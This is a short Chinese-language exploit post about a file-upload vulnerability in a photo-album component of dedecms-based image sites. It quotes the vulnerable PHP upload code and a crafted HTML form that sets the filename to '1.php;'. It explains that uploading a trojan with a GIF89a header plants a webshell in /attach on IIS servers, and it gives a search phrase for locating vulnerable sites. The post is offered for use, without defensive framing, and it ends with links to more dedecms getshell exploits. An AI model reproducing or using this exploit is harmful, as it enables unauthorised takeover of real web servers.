漏洞出现在
index.php
if($do == 'upload'){
if($_POST['formsub']){
$file = $_FILES['upload'];
if(!$file['error']){
if(strpos($file['type'], 'image') === 0){
$hash = $_POST['i'].'.jpg'; //若是IIS,则可此处可自行构造IIS畸形文件扩展名得到一个webshell
if(move_uploaded_file($file['tmp_name'], "./attach/$hash")){
thumb("./attach/$hash");
js_reload();
} else{
js_alert('保存失败!');
}
} else{
js_alert('不支持的格式!');
}
} else{
js_alert('上传出错啦!');
}
}
}
本地构造表单
<form action="http://XXX.com/user/index.php?do=upload" method="post" enctype="multipart/form-data" name="form_post" id="form_post" target="ajax">
<input type="file" name="upload">
<input type="hidden" name="i" value="1.php;"> 这里可以改为1.asp;或者别的类型的文件
<input type="hidden" name="formsub" value="true">
<input name="submit" type="submit" value="上传">
<iframe name="ajax" id="ajax" style="display:none"></iframe>
</form>
提交一个包含"gif89a"文件头的木马(大马),会在/attach目录下生成一个1.php;.jpg的webshell。如果IE显示红X,请换火狐
利用:搜索关键词“专注于收集、发布网友喜欢的图片”。这套相册大部分集成于dedecms的图片类网站,目录为http://www.xxx.com/user
只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27868, 评论: 0)
dedecms 管理后台程序下载漏洞 (浏览: 13255, 评论: 0)
dedecms默认的注册用户 (浏览: 12972, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13765, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16394, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37602, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22247, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11176, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10282, 评论: 0)